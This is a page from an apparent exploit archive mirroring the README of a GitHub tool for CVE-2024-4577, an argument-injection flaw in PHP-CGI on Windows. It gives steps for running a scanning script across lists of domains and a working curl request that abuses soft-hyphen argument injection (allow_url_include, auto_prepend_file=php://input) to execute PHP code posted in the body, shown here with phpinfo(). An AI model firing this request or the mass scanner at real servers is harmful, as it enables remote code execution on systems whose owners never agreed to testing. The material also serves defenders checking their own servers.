Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source
https://github.com/Yukiioz/CVE-2024-4577
Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# CVE-2024-4577 Vulnerability Checker

This script is designed to check for the vulnerability described by CVE-2024-4577, which involves exploiting certain PHP configurations to execute arbitrary code remotely. It sends a POST request to specified endpoints on a list of domains and checks if the response indicates vulnerability.

## Usage

1. Install GNU Parallel:

   ```bash
   sudo apt-get install parallel
   ```
   
2. **Clone the Repository:**
   Clone this repository to your local machine using Git:

   ```bash
   git clone https://github.com/Yukiioz/CVE-2024-4577.git
   ```

3. **Navigate to the Repository:**
   Change into the cloned directory:

   ```bash
   cd CVE-2024-4577
   ```

4. **Prepare Domain List:**
   Create a text file containing a list of domains to check. Each domain should be on a new line. For example:

   ```
   https://example1.com
   https://example2.com
   https://example3.com
   ```

5. **Run the Script:**
   Execute the script `CVE-2024-4577.sh`, passing the path to the domain list file as an argument:

   ```bash
   ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
   ```

6. **Review Output:**
   The script will display progress information as it checks each domain. If a domain is found to be vulnerable, it will be highlighted in red. The script will also export a list of vulnerable domains to a file named `vulnerable_domains.txt`.

#### Exported File: `vulnerable_domains.txt`

The script exports a list of vulnerable domains to a file named `vulnerable_domains.txt`. This file contains a simple list of vulnerable domains, with each domain on a new line. To further manually confirm, use the curl command to send a POST request to the target endpoint on the domain. Replace https://dev.example.com/test.php with the actual endpoint on the target domain.

```bash
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
```
File Snapshot

 [4.0K]  /data/pocs/3aa6fe5fcfd13c77da12190366b7c47ddb4565bd
├── [1.1K]  CVE-2024-4577.sh
└── [2.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →